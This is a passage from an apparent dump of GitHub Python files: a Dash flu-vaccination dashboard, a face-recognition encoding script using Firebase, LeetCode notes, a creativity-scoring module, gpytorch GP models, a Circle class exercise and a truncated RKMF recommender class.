df.groupby([\"h1n1_concern\",\"h1n1_vaccine\"],as_index=True)[\"opinion_h1n1_risk\"].count().reset_index(name=\"count\")\ndata['Percentage'] = (data['count'] /data['count'].sum()*100).round()\n\ndata1 = df.groupby([\"h1n1_vaccine\"],as_index=True)[\"h1n1_vaccine\"].count().reset_index(name=\"count\")\ndata1['Percentage'] = (data1['count'] /data1['count'].sum()*100).round()\n\ndata2 = df.groupby([\"seasonal_vaccine\"],as_index=True)[\"seasonal_vaccine\"].count().reset_index(name=\"count\")\ndata2['Percentage'] = (data2['count'] /data2['count'].sum()*100).round()\n\ndata3 = 
df.groupby([\"doctor_recc_h1n1\",\"h1n1_vaccine\"],as_index=True)[\"doctor_recc_h1n1\"].count().reset_index(name=\"count\")\ndata3['Percentage'] = (data3['count'] /data3['count'].sum()*100).round()\n\ndf_dist_h1n1 = df.h1n1_vaccine.value_counts(normalize=True).round(2).rename_axis('Vacc').reset_index(name='counts')\ndf_dist_seas = df.seasonal_vaccine.value_counts(normalize=True).round(2).rename_axis('Vacc').reset_index(name='counts')\n\nexternal_stylesheets = [\"https://codepen.io/chriddyp/pen/bWLwgP.css\"]\n\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\n# this is needed by gunicorn command in procfile\nserver = app.server\n\n\n'''def get_figure(filter= None):\n chart_data =[]\n \n if filter == \"not_vaccinated\":\n chart_data = [\n go.Bar(name='Not vaccined', x=data.query('h1n1_vaccine == 0')['h1n1_concern'], y=data.query('h1n1_vaccine == 0')['Percentage']),\n ]\n\n elif filter == \"vaccinated\":\n chart_data = [\n go.Bar(name='Vaccined', x=data.query('h1n1_vaccine == 1')['h1n1_concern'], y=data.query('h1n1_vaccine == 1')['Percentage'])\n ]\n\n else: \n chart_data = [\n go.Bar(name='Not vaccined', x=data.query('h1n1_vaccine == 0')['h1n1_concern'], y=data.query('h1n1_vaccine == 0')['Percentage']),\n go.Bar(name='Vaccined', x=data.query('h1n1_vaccine == 1')['h1n1_concern'], y=data.query('h1n1_vaccine == 1')['Percentage'])\n ]\n\n fig_plot = go.Figure(data=chart_data,\n layout=go.Layout(template=\"simple_white\"))\n\n # Change the bar mode\n fig_plot.update_layout(barmode='group')\n fig_plot.update_xaxes(title='Concern of H1N1',\n ticktext=['Not at all concerned 1', 'Not very concerned', 'Somewhat concerned', 'Very concerned'],\n tickmode='array', tickvals = [0,1, 2, 3])\n fig_plot.update_yaxes(title='Percentage of vaccinations')\n \n return fig_plot\n\nfig = get_figure()\n'''\n\ndef get_figure(filter= None):\n chart_data =[]\n\n if filter == \"h1n1_vaccines\":\n chart_data = [\n go.Bar(name=\"H1N1 vaccines\", x=df_dist_h1n1.Vacc, y=df_dist_h1n1.counts, \n marker_color='rgb(25,25,112)', text=df_dist_h1n1.counts, textposition='auto')\n ]\n\n elif filter == \"seasonal_flu_vaccine\":\n chart_data = [\n go.Bar(name=\"Seasonal flu vaccine\", x=df_dist_seas.Vacc, y=df_dist_seas.counts, \n marker_color='rgb(188,143,143)', text=df_dist_seas.counts, textposition='auto')\n ] \n\n else: \n chart_data = [\n go.Bar(name=\"H1N1 vaccines\", x=df_dist_h1n1.Vacc, y=df_dist_h1n1.counts, \n marker_color='rgb(25,25,112)', text=df_dist_h1n1.counts, textposition='auto'),\n \n go.Bar(name=\"Seasonal flu vaccine\", x=df_dist_seas.Vacc, y=df_dist_seas.counts, \n marker_color='rgb(188,143,143)', text=df_dist_seas.counts,textposition='auto')\n ]\n\n fig_plot = go.Figure(data=chart_data,\n layout=go.Layout(template=\"simple_white\"))\n\n\n # Change the bar mode\n fig_plot.layout = dict(title='Vaccination Status in Sample', \n # This code removes the 3.0 from the plot (which was shown although value was dropped):\n #xaxis = dict(type=\"category\", categoryorder='category ascending')\n )\n fig_plot.update_xaxes( \n ticktext=[\"Not vaccinated\", \"Vaccinated\"], \n tickmode='array', tickvals = [0,1],\n tickangle=0,tickfont_size=14\n )\n fig_plot.update_yaxes(title='Share within sample')\n\n return fig_plot\n\nfig = get_figure()\n\n\n\n\n\n# Creating plots for the distribution of our target(H1N1) variables \n\n\n'''def get_figure_targets_H1N1():\n fig = go.Figure(data=[\n go.Bar(name='Not vaccinated', x=data1.query('h1n1_vaccine == 0')['h1n1_vaccine'], y=data1.query('h1n1_vaccine == 
0')['Percentage']),\n go.Bar(name='Vaccinated', x=data1.query('h1n1_vaccine == 1')['h1n1_vaccine'], y=data1.query('h1n1_vaccine == 1')['Percentage'])\n],\n layout=go.Layout(template=\"simple_white\"))\n\n # Change the bar mode\n fig.update_layout(barmode='group')\n fig.update_xaxes(title='Distribution of the H1N1 Target',\n ticktext=['Vaccinated', 'Not Vaccinated'],\n tickmode='array', tickvals = [1, 0])\n fig.update_yaxes(title='Percentage')\n \n return fig\n\nfig_targets_H1N1 = get_figure_targets_H1N1()'''\n\n\n\n\n'''# Creating plots for the distribution of our target(Seasonal) variables \n\ndef get_figure_targets_Seas():\n fig = go.Figure(data=[\n go.Bar(name='Not vaccinated', x=data2.query('seasonal_vaccine == 0')['seasonal_vaccine'], y=data2.query('seasonal_vaccine == 0')['Percentage']),\n go.Bar(name='Vaccinated', x=data2.query('seasonal_vaccine == 1')['seasonal_vaccine'], y=data2.query('seasonal_vaccine == 1')['Percentage'])\n],\n layout=go.Layout(template=\"simple_white\"))\n\n # Change the bar mode\n # Change the bar mode\n fig.update_layout(barmode='group')\n fig.update_xaxes(title='Distribution of the Seasonal Flu Target',\n ticktext=['Vaccinated', 'Not Vaccinated'],\n tickmode='array', tickvals = [1, 0])\n fig.update_yaxes(title='Percentage')\n \n return fig\n\nfig_targets_Seas = get_figure_targets_Seas()'''\n\n\n# Creating plots for the distribution of people with recommendation that shows both vaccinated and not vaccinated\n\n\ndef get_figure_targets_doc_recc():\n fig = go.Figure(data=[\n go.Bar(name='Not vaccinated', x=data3.query('h1n1_vaccine == 0')['doctor_recc_h1n1'], y=data3.query('h1n1_vaccine == 0')['Percentage']),\n go.Bar(name='Vaccinated', x=data3.query('h1n1_vaccine == 1')['doctor_recc_h1n1'], y=data3.query('h1n1_vaccine == 1')['Percentage'])\n],\n layout=go.Layout(template=\"simple_white\"))\n\n # Change the bar mode\n fig.update_layout(barmode='group')\n fig.update_xaxes(title='Distribution of people with doctor´s recommendation for H1N1',\n ticktext=['Recommended', 'Not Recommended'],\n tickmode='array', tickvals = [1, 0])\n fig.update_yaxes(title='Percentage')\n \n return fig\n\nfig_targets_H1N1_doc_recc = get_figure_targets_doc_recc()\n\n\ndef get_default_bar(data):\n return px.bar(data)\n\ndefault_bar= get_default_bar(data)\n\n\ndefault_bar = get_figure()\napp.layout = html.Div(\n \n\n children=[\n \n html.H2(\n id=\"title\",\n children=\"Flushot Interactive Dashboard\",\n ),\n html.H1(children=\"\"),\n html.Div(\n children=[\n html.H2(\"Inputs\"),\n html.Div(\n children=[\n html.P(\"Vaccination_Distribution\"),\n dcc.Dropdown(\n id=\"Distribution-dropdown\",\n options=[\n {\"label\": \"Both\", \"value\": \"both\"},\n {\"label\": \"H1N1 vaccines\", \"value\": \"h1n1_vaccines\"},\n {\"label\": \"Seasonal flu vaccine\", \"value\": \"seasonal_flu_vaccine\"},\n ],\n value=\"both\",\n ),\n ],\n ),\n \n ],\n\n # mit style kann man CSS-Formatierungen verwenden\n style={\n \"backgroundColor\": \"#DDDDDD\",\n \"maxWidth\": \"800px\",\n \"padding\": \"10px 20px\",\n },\n ), \n html.Div(\n children=[\n html.H2(\"bar-chart\"),\n dcc.Graph(id=\"bar-chart\", figure=default_bar),\n ],\n \n ),\n\n\n #html.Button(\"Submit\", id=\"textarea-state-example-button\", n_clicks=0),\n #html.\n html.Div(id=\"textarea-state-example-output\", style={\"whiteSpace\": \"pre-line\"}),\n #dcc.Graph(id=\"bar-chart\", figure=fig),\n #dcc.Graph(id=\"bar-chart_1\", figure=fig_targets_H1N1),\n #dcc.Graph(id=\"bar-chart_2\", figure=fig_targets_Seas),\n #dcc.Graph(id=\"bar-chart_3\", 
figure=fig_targets_H1N1_doc_recc),\n ]\n)\n\n# https://dash.plotly.com/basic-callbacks\n@app.callback(\n \n #Output(\"textarea-state-example-output\", \"children\"),\n Output(\"bar-chart\", \"figure\"),\n \n Input(\"Distribution-dropdown\", \"value\"), #Input(\"n-input\", \"value\")],\n #State(\"Distribution-dropdown\", \"value\"),\n)\ndef update_output(value):\n\n return get_figure(value)\n\n\n\n# Add the server clause:\nif __name__ == \"__main__\":\n app.run_server()\n\n\n\n\n\n\n \n","repo_name":"RayKwame/fight-the-flu-dash","sub_path":"app_initial.py","file_name":"app_initial.py","file_ext":"py","file_size_in_byte":9381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19045010398","text":"import cv2\r\nimport face_recognition\r\nimport pickle\r\nimport os\r\nimport firebase_admin\r\nfrom firebase_admin import credentials\r\nfrom firebase_admin import db\r\nfrom firebase_admin import storage\r\nfrom PIL import Image\r\n\r\n\r\ncred = credentials.Certificate(\"serviceAccountKey.json\")\r\nfirebase_admin.initialize_app(cred,{ #this format is used as we're working with JSON format\r\n 'databaseURL':\"https://faceattendance-18c5a-default-rtdb.firebaseio.com/\",\r\n 'storageBucket': \"faceattendance-18c5a.appspot.com\",\r\n})\r\n\r\n\r\n# # Specify the path of the folder containing the images\r\n# folder_path = 'images'\r\n#\r\n# # Create a new folder to store the resized images\r\n# if not os.path.exists('Resized Images'):\r\n# os.makedirs('Resized Images')\r\n#\r\n# # Loop through all the images in the folder\r\n# for filename in os.listdir(folder_path):\r\n# image_path = os.path.join(folder_path, filename)\r\n#\r\n# # Open the image and resize it to 216x216\r\n# with Image.open(image_path) as img:\r\n# img = img.resize((216, 216))\r\n#\r\n#\r\n# # Save the image in PNG format to the \"Resized Images\" folder\r\n# new_image_path = os.path.join('Resized Images', filename.replace(\".jpg\", \"\").replace(\".jpeg\", \"\").replace(\".JPG\", \"\").replace(\".png\", \"\") + \".png\")\r\n# img.save(new_image_path, \"PNG\")\r\n#\r\n# print(\"Resized Complete\")\r\n\r\n#Importing student images\r\nfolderPath = 'Preprocessed Images' #path for the resized images\r\npathList = os.listdir(folderPath)\r\nprint(pathList)\r\nimgList = []\r\nstudentIds = []\r\nfor path in pathList:\r\n imgList.append(cv2.imread(os.path.join(folderPath, path)))\r\n #print(imgList)\r\n print(path)\r\n print(os.path.splitext(path)[0]) #obtaining the ids from the file name\r\n studentIds.append(os.path.splitext(path)[0])\r\n\r\n fileName = f'{folderPath}/{path}'#creates a folder called images in storage\r\n bucket = storage.bucket()\r\n blob = bucket.blob(fileName) #for sending\r\n blob.upload_from_filename(fileName)\r\n\r\n\r\n\r\nprint(studentIds)\r\n\r\ndef findEncodings(imagesList):\r\n encodeList = []\r\n for img in imagesList:\r\n # openCV uses BGR but facial recognition uses RGB\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n #find encodings\r\n encode = face_recognition.face_encodings(img)[0]\r\n encodeList.append(encode) #Loops through to save all encodings of the images\r\n\r\n return encodeList\r\n\r\n\r\nprint(\"Encoding Started ...\") #takes a while if there are a lot of images\r\nencodeListKnown = findEncodings(imgList)\r\nencodeListKnownWithIds = [encodeListKnown, studentIds] #the two lists to be stored in the pickle file\r\nprint(encodeListKnownWithIds) #prints the encodings of the images\r\nprint(\"Encoding Complete\")\r\n\r\n#storing the 
encodings with Ids in the pickle file so that we can import it while we're using the webcam\r\nfile = open(\"EncodeFile.p\", 'wb')\r\npickle.dump(encodeListKnownWithIds, file)\r\nfile.close()\r\nprint(\"File Saved\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"EstherMamai/Facial-recognition-","sub_path":"EncodeGenerator.py","file_name":"EncodeGenerator.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27459591261","text":"\n\"\"\"\nAlgorithms:\n1. Brute Force\n2. Sliding window\n3. Two pointers \n\"\"\"\n\n\n\ndsa = dict()\ndsa[0] = (\"10.2\", \"LeetCode 1 - Two sum\")\ndsa[1] = (\"10.5\", \"LeetCode 217 - Contains Duplicate\")\ndsa[2] = (\"10.7\", \"LeetCode 48 - Rotate Image\")\ndsa[3] = (\"40.373\", \"LeetCode 110 - Balanced Binary Tree\")\ndsa[4] = (\"40.374\", \"LeetCode 98 - Validate Binary Search Tree\")\ndsa[5] = (\"40.375\", \"LeetCode 285 - In-order Successor in BST\")\ndsa[6] = (\"40.377\", \"LeetCode 236 - Lowest Common Ancestor of a Binary Tree\") # not finish yet \n\n\nalgorithms = dict()\nalgorithms[0] = (15, \"LeetCode 283\", \"Move zeros\")\nalgorithms[1] = (21, \"LeetCode 881\", \"Boats to Save People\")\nalgorithms[2] = (26, \"LeetCode 941\", \"Valid Mountain Array\")\nalgorithms[3] = (31, \"LeetCode 11\", \"Container with most water\")\nalgorithms[4] = (38, \"LeetCode 3\", \"Longest Substring without repeating\")\nalgorithms[5] = (41, \"LeetCode 34\", \"Find first and last position of element in sorted array\")\nalgorithms[6] = (48, \"LeetCode 278\", \"First bad version\")\nalgorithms[7] = (53, \"LeetCode 268\", \"Missing number\")\nalgorithms[8] = (59, \"LeetCode 204\", \"Count Primes\")\nalgorithms[9] = (65, \"LeetCode 136\", \"Single number\")\nalgorithms[10] = (71, \"LeetCode 657\", \"Robot return to origin\")\nalgorithms[11] = (74, \"LeetCode 67\", \"Add Binary\")\nalgorithms[12] = (84, \"LeetCode 1\", \"Two sum\")\nalgorithms[13] = (91, \"LeetCode 217\", \"Contains Duplicate\")\nalgorithms[14] = (94, \"LeetCode 169\", \"Majority Element\")\nalgorithms[15] = (97, \"LeetCode 49\", \"Group Anagrams\")\nalgorithms[16] = (100, \"LeetCode 454\", \"4Sum II\")\nalgorithms[17] = (105, \"LeetCode 146\", \"LRU Cache\") \nalgorithms[18] = (113, \"LeetCode 76\", \"Minimum Window Substring\") # from collections import OrderedDict, deque\nalgorithms[19] = (123, \"LeetCode 21\", \"Merge Two sorted lists\") \nalgorithms[20] = (126, \"LeetCode 141\", \"Linked List Cycle\") \nalgorithms[21] = (129, \"LeetCode 206\", \"Reverse Linked List\")\nalgorithms[22] = (132, \"LeetCode 2\", \"Add Two Numbers\")\nalgorithms[23] = (135, \"LeetCode 19\", \"Remove Nth Node From End of List\")\nalgorithms[24] = (138, \"LeetCode 328\", \"Odd Even Linked List\")\nalgorithms[25] = (141, \"LeetCode 23\", \"Merge K Sorted Lists\") # not finished yet\nalgorithms[26] = (143, \"LeetCode 78\", \"Subsets\")\nalgorithms[27] = (145, \"LeetCode 17\", \"Letter Combinations of a Phone Number\")\nalgorithms[28] = (147, \"LeetCode 79\", \"Word Search\") # not finished yet \nalgorithms[29] = (194, \"LeetCode 236\", \"Lowest Common Ancestor of a Binary Tree\") # ?\nalgorithms[30] = (214, \"LeetCode 198\", \"House Robber\") # divide and conqer, dynamic \n\n\n\ngoogle = dict()\ngoogle[0] = (150, \"Evaluate Reverse Polish Notation\") # use stack\ngoogle[1] = (299, \"Bulls and Cows\") # use hash, because only 10 digits, can use [0] * 10 too\ngoogle[2] = (359, \"Logger Rate Limiter\")\ngoogle[3] = 
(366, \"Find Leaves of Binary Tree\")\ngoogle[4] = (384, \"Shuffle an Array\") # Fisher-Yates algorithm \ngoogle[5] = (394, \"Decode String\") # use stack, be careful about the order appending str, \n# ppl complain it should be hard, but i solved it easily. 2022-02-27Sun 00:00:30\ngoogle[6] = (418, \"Sentence Screen Fitting\")\ngoogle[7] = (528, \"Random Pick with Weight\")\ngoogle[8] = (539, \"Minimum Time Difference\")\ngoogle[9] = (593, \"Valid Square\")\ngoogle[10] = (652, \"Find Duplicate Subtrees\") # hash all nodes\ngoogle[11] = (690, \"Employee Importance\")\ngoogle[12] = (777, \"Swap Adjacent in LR String\")\ngoogle[13] = (792, \"Number of Matching Subsequences\")\ngoogle[14] = (794, \"Valid Tic-Tac-Toe State\")\ngoogle[15] = (833, \"Find And Replace in String\")\ngoogle[16] = (900, \"RLE Iterator\")\ngoogle[17] = (939, \"Minimum Area Rectangle\")\ngoogle[18] = (954, \"Array of Doubled Pairs\")\ngoogle[19] = (990, \"Satisfiability of Equality Equations\")\ngoogle[20] = (1048, \"Longest String Chain\")\n\n\n\n","repo_name":"chen-qian-dan/Algorithms_And_Data_Structures_20211227Mon","sub_path":"*DSA/LeetCode.py","file_name":"LeetCode.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11818346913","text":"import pandas as pd\nimport spacy\nimport numpy as np\nfrom transform_data_by_response import transform_data_by_response\nfrom fluency import calc_fluency\nfrom flexibility_elaboration import calc_flexibility_and_elaboration, calc_flexibility_and_elaboration_multi_target\nfrom originality import calc_originality\n\n\ndef z_score(array):\n \"\"\"Convert array of numbers to Z scores\"\"\"\n return (array - np.nanmean(array)) / np.std(array)\n\n\ndef mean_by_subject(by_subject_df, by_response_df, variable):\n \"\"\"Calculate the mean score by subject (variable 'ID' in both by_subject_df and by_response_df\n\n Arguments\n ---------\n by_subject_df: pandas dataframe\n output dataframe (one row per subject, column 'ID' has subject IDs)\n by_response_df: pandas dataframe\n input dataframe (one row per response, multiple responses per subject, column 'ID' has subject IDs)\n variable: str\n column name of data to average in by_response_df\n\n Returns\n -------\n pandas series\n new column to add to by_subject_df containing the mean of 'variable' by subject\n \"\"\"\n return by_subject_df.apply(\n lambda row:\n np.nanmean(by_response_df.loc[by_response_df.ID == row.ID, variable]),\n axis=1\n )\n\n\ndef calc_all_creativity(data_by_response, target_word=None, nlp=None, output_prefix='', multi_target=False):\n \"\"\" Calculate fluency, flexibility, elaboration, and originality. Then Z score and calculate creativity score\n\n This function calls fluency.py, flexibility_elaboration.py, and originality.py to calculate the four\n divergent thinking metrics. Flexibility, elaboration, and originality are calculated for each response, then\n Z scored and averaged within each participant. Fluency is calculated for each participant and then Z scored.\n Each participant's Z scored flexibility, elaboration, originality, and fluency are then averaged into a single\n score (labeled 'creativity_score').\n\n Arguments\n ---------\n data_by_response: pandas dataframe\n dataframe as created by transform_data_by_response.py. One row per response with columns 'responseID', 'ID',\n and 'response'. 
If multi_target is True, there should also be a 'target_word' column\n target_word: str, optional\n task's target word, used to calculate flexibility in flexibility_elaboration.py.\n Should be string if multi_target is False, and list if multi_target is True\n nlp: Spacy model, optional\n output from spacy.load(). If not provided, will load 'en_vectors_web_lg'.\n output_prefix: str, optional\n prefix to use for column names in output. (default no prefix)\n multi_target: bool, optional\n True if responses use different target words, False if all responses use the same target word. (default False)\n\n Returns\n -------\n {\n results_by_subject: pandas dataframe\n dataframe with one row per subject containing each subject's average z scored originality, flexibility,\n and elaboration, raw and z-scored fluency, and creativity_score\n results_by_response: pandas dataframe\n dataframe with one row per response containing cleaned responses, and both raw and z scored originality,\n flexibility, and originality\n }\n \"\"\"\n if (target_word is None) & (not multi_target):\n raise TypeError(\n \"If the task has a single target word, provide a target_word argument. If there are multiple target words, \"\n + \"set the multi_target argument to True and make sure data_by_response has a 'target_word' column\")\n\n if nlp is None:\n print('Loading spacy model: en_vectors_web_lg')\n nlp = spacy.load('en_vectors_web_lg')\n # make sure prefix ends in _ if there is one\n if not (output_prefix.endswith('_') | (output_prefix == '')):\n output_prefix = output_prefix + '_'\n\n results_df = pd.DataFrame({'responseID': data_by_response.responseID, 'ID': data_by_response.ID})\n print('Calculating fluency using fluency.py')\n results_df['fluency'] = calc_fluency(data_by_response, nlp)\n print('Calculating elaboration and flexibility using flexibility_elaboration.py')\n results_df[['clean_response', 'elaboration', 'flexibility']] = \\\n calc_flexibility_and_elaboration(list(data_by_response.response), target_word, nlp) if not multi_target else \\\n calc_flexibility_and_elaboration_multi_target(list(data_by_response.response),\n list(data_by_response.target_word),\n nlp)\n print('Calculating originality using originality.py')\n results_df['originality'] = calc_originality(data_by_response.response)\n\n print('Z-scoring and concatenating results')\n results_df['z_elaboration'] = z_score(results_df.elaboration)\n results_df['z_flexibility'] = z_score(results_df.flexibility)\n results_df['z_originality'] = z_score(results_df.originality)\n\n results_by_subject = pd.DataFrame({'ID': results_df.ID.unique()})\n elab_out_name, flex_out_name, orig_out_name, flue_out_name, creativity_out_name = [\n output_prefix + n for n in ['elaboration', 'flexibility', 'originality', 'fluency',\n 'creativity_score']]\n results_by_subject[elab_out_name + '_z'] = mean_by_subject(results_by_subject, results_df, 'z_elaboration')\n results_by_subject[elab_out_name + '_raw'] = mean_by_subject(results_by_subject, results_df, 'elaboration')\n results_by_subject[flex_out_name + '_z'] = mean_by_subject(results_by_subject, results_df, 'z_flexibility')\n results_by_subject[flex_out_name + '_raw'] = mean_by_subject(results_by_subject, results_df, 'flexibility')\n results_by_subject[orig_out_name + '_z'] = mean_by_subject(results_by_subject, results_df, 'z_originality')\n results_by_subject[orig_out_name + '_raw'] = mean_by_subject(results_by_subject, results_df, 'originality')\n\n results_by_subject[flue_out_name + '_raw'] = 
mean_by_subject(results_by_subject, results_df, 'fluency')\n results_by_subject[flue_out_name + '_z'] = z_score(results_by_subject[flue_out_name + '_raw'])\n\n results_by_subject[creativity_out_name] = results_by_subject[[elab_out_name + '_z',\n flex_out_name + '_z',\n orig_out_name + '_z',\n flue_out_name + '_z']].mean(axis=1)\n\n print('Done calculating all creativity metrics\\n')\n\n return {'results_by_subject': results_by_subject, 'results_by_response': results_df}\n\n","repo_name":"jnmildner/unusual-uses-analysis","sub_path":"calc_all_creativity.py","file_name":"calc_all_creativity.py","file_ext":"py","file_size_in_byte":6702,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20841018375","text":"# https://leetcode.com/problems/running-sum-of-1d-array/\nclass Solution:\n def runningSum(self, nums: list) -> list:\n \"\"\"\n >>> Solution().runningSum(nums=[1,2,3,4])\n [1, 3, 6, 10]\n >>> Solution().runningSum(nums=[1,1,1,1,1])\n [1, 2, 3, 4, 5]\n >>> Solution().runningSum(nums=[3,1,2,10,1])\n [3, 4, 6, 16, 17]\n \"\"\"\n arr = []\n sum = 0\n for n in nums:\n sum += n\n arr.append(sum)\n return arr\n","repo_name":"markplotlib/data-structures","sub_path":"primitives/running_sum.py","file_name":"running_sum.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42180137402","text":"#!/usr/bin/python\n\"\"\"\n@author: Iñigo Urteaga\n\"\"\"\n\n# Imports: python modules\nimport pdb\n# Gaussian process with pytorch\nimport gpytorch\n\n# Exact (non-contextual) GP model class\nclass ExactGPModel(gpytorch.models.ExactGP):\n def __init__(self, \n a, y, \n mean_function, kernel_function,\n likelihood\n ):\n # Init Exact GP model\n super(ExactGPModel, self).__init__(a, y, likelihood)\n \n # Init all modules\n self.mean_module = mean_function\n self.covar_module = kernel_function\n\n def forward(self, a):\n mean_a = self.mean_module(a)\n covar_a = self.covar_module(a)\n return gpytorch.distributions.MultivariateNormal(mean_a, covar_a)\n\n# Exact Contextual GP model class\nclass ExactContextualGPModel(gpytorch.models.ExactGP):\n def __init__(self,\n gp_input, y,\n d_context,\n mean_functions, kernel_functions, action_context_composition,\n likelihood\n ):\n # Init Exact GP model\n super(ExactContextualGPModel, self).__init__(gp_input, y, likelihood)\n \n # Figure out dimensionality of context and actions\n self.d_context=d_context\n \n # Init all modules\n self.mean_modules = mean_functions\n self.covar_modules = kernel_functions\n self.action_context_composition= action_context_composition\n \n def forward(self, gp_input): \n if self.action_context_composition is None:\n # Action and context are modeled jointly\n mean=self.mean_modules['joint'](gp_input)\n covar=self.covar_modules['joint'](gp_input)\n \n else:\n # Action and context are modeled separately\n # Separate context and actions\n x = gp_input[:,:self.d_context]\n a = gp_input[:,self.d_context:]\n \n # Context Mean\n mean_x = self.mean_modules['context'](x)\n # Action Mean\n mean_a = self.mean_modules['action'](a)\n \n # Context kernel\n covar_x = self.covar_modules['context'](x)\n # Action kernel\n covar_a = self.covar_modules['action'](a)\n \n # Combine\n if self.action_context_composition == 'add':\n mean = mean_x + mean_a\n covar = covar_x + covar_a\n elif self.action_context_composition == 'product':\n mean = mean_x * mean_a\n covar = covar_x * covar_a\n else:\n raise 
ValueError('Action/context composition={} not implemented yet'.format(self.action_context_composition))\n \n # Return Multivariate Normal with computed mean and covariance\n return gpytorch.distributions.MultivariateNormal(mean, covar)\n\n","repo_name":"iurteaga/gp_ts_nlp","sub_path":"bandits/gp_models.py","file_name":"gp_models.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15499509630","text":"# part 1\n# Create a Circle class with a constructor that requires a single argument. \n# This argument should be the radius of the circle.\n\nclass Circle:\n def __init__(self, radius):\n self.radius = radius\n\ncircle = Circle(10)\nprint(\"circle, expecting '10' (radius):\", circle.radius)\n\n# part 2\n# Create a completely different version of your Circle class that requires \n# a single argument. This time, allow the developer to specify whether the \n# value supplied is the diameter or the radius of the circle. \n# You should only store the Circle's radius.\n\nclass Circle2:\n def __init__(self, size = {}):\n if \"radius\" in size:\n self.radius = size[\"radius\"]\n elif \"diameter\" in size:\n self.radius = size[\"diameter\"] / 2\n else:\n self.radius = False\n\ncircle2withRadius = Circle2({\"radius\": 10})\ncircle2withDiameter = Circle2({\"diameter\": 22})\ncircle2withNoArg = Circle2()\ncircle2withBadKey = Circle2({\"bad\": 3})\n\nprint(\"circle 2, with radius, expecting '10' (radius):\", circle2withRadius.radius)\nprint(\"circle 2, with diameter, expecting '11' (radius):\", circle2withDiameter.radius)\nprint(\"circle 2, with no arg, expecting 'False' (radius):\", circle2withNoArg.radius)\nprint(\"circle 2, with bad key, expecting 'False' (radius):\", circle2withBadKey.radius)\n\n# part 3\n# - ruby instructions -\n# Modify your constructor to make use of the kind_of? method. \n# Your Circle class supports both setting a radius as the exclusive, \n# numeric argument to the constructor and the ability to specify a diameter \n# or radius as an option. 
This portion will combine the functionalities of \n# both parts I and II.\n# - python version -\n# Same as above, but using Python's type checking: type(arg) is int/dict\n\nclass Circle3:\n def __init__(self, size = {}):\n if type(size) is dict:\n if \"radius\" in size:\n self.radius = size[\"radius\"]\n elif \"diameter\" in size:\n self.radius = size[\"diameter\"] / 2\n else:\n self.radius = False\n elif type(size) is int:\n self.radius = size\n else:\n self.radius = False\n\ncircle3withDict = Circle3({\"radius\": 10})\ncircle3withInt = Circle3(6)\ncircle3withNoArg = Circle3()\n\nprint(\"circle 3, given '{radius: 10}', expecting '10' (radius):\", circle3withDict.radius)\nprint(\"circle 3, given '6', expecting '6' (radius):\", circle3withInt.radius)\nprint(\"circle 3, given no args, expecting 'False' (radius):\", circle3withNoArg.radius)","repo_name":"jefferyshivers/launch-academy-week1-python","sub_path":"circle-constructor/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10872039884","text":"\"\"\"Este módulo contiene la implementación de RKMF\n con Kernel lineal y non-negative constraints\n utilizada en el taller\n\"\"\"\nimport math\nimport numpy as np\nfrom surprise import AlgoBase\nfrom surprise import PredictionImpossible\n\nclass RKMFAlgorithm(AlgoBase):\n \"\"\"Clase que implementa RKMF con Kernel lineal y non-negative constraints\"\"\"\n def __init__(self, n_factors=100, n_epochs=20, lr=0.005, reg=0.02, noise=0.01):\n \"\"\"Se inicializa el algoritmo con los hiper-parámetros dados por parámetro.\n Se inicializan adicionalmente los demás factores a utilizar en RKMF con valores temporales\n Parámetros:\n n_factors: Número de factores que tendrán las matrices de usuarios e ítems.\n n_epochs: Número de epochs en los que se aplicará el Stochastic Gradient Descent.\n lr: El learning rate del modelo.\n reg: El valor de regularización del modelo.\n noise: Valor que se utiliza a la hora de inicializar las matrices de usuarios x factores\n e ítems x factores.\n \"\"\"\n self.n_factors = n_factors\n self.n_epochs = n_epochs\n self.lr = lr\n self.reg = reg\n self.noise = noise\n\n # Se inicializan los distintos factores relevantes en el algoritmo\n # con valores temporales\n self.init_low = 0.0\n self.init_high = 5.0\n self.kernel_a = 3.0\n self.kernel_c = 1\n self.pu = None\n self.qi = None\n AlgoBase.__init__(self)\n\n\n def fit(self, trainset):\n \"\"\"Entrena el modelo con la información dada en un dataset de entrenamiento\"\"\"\n AlgoBase.fit(self, trainset)\n self.define_trainset_derived_attributes(trainset)\n self.sgd(trainset)\n return self\n\n\n def define_trainset_derived_attributes(self, trainset):\n \"\"\"Define los valores de los factores relevantes para el \n modelo a los que se les asignaron valores temporales\n \"\"\"\n # Se calcula el rating mínimo y el rating máximo para poder definir\n # el valor de a, c y el rango de valores donde se inicializarán los\n # valores de la matriz de usuarios x factores e ítems x factores\n r_min = None\n r_max = None\n for _, _, rating in trainset.all_ratings():\n if r_min is None or rating < r_min:\n r_min = rating\n if r_max is None or rating > r_max:\n r_max = rating\n # Se definen a y c siguiendo la recomendación dada en el paper\n # Estos valores son usados para realizar la predicción de ratings\n self.kernel_a = r_min\n self.kernel_c = r_max - r_min\n # Se calcula el rango de valores donde se 
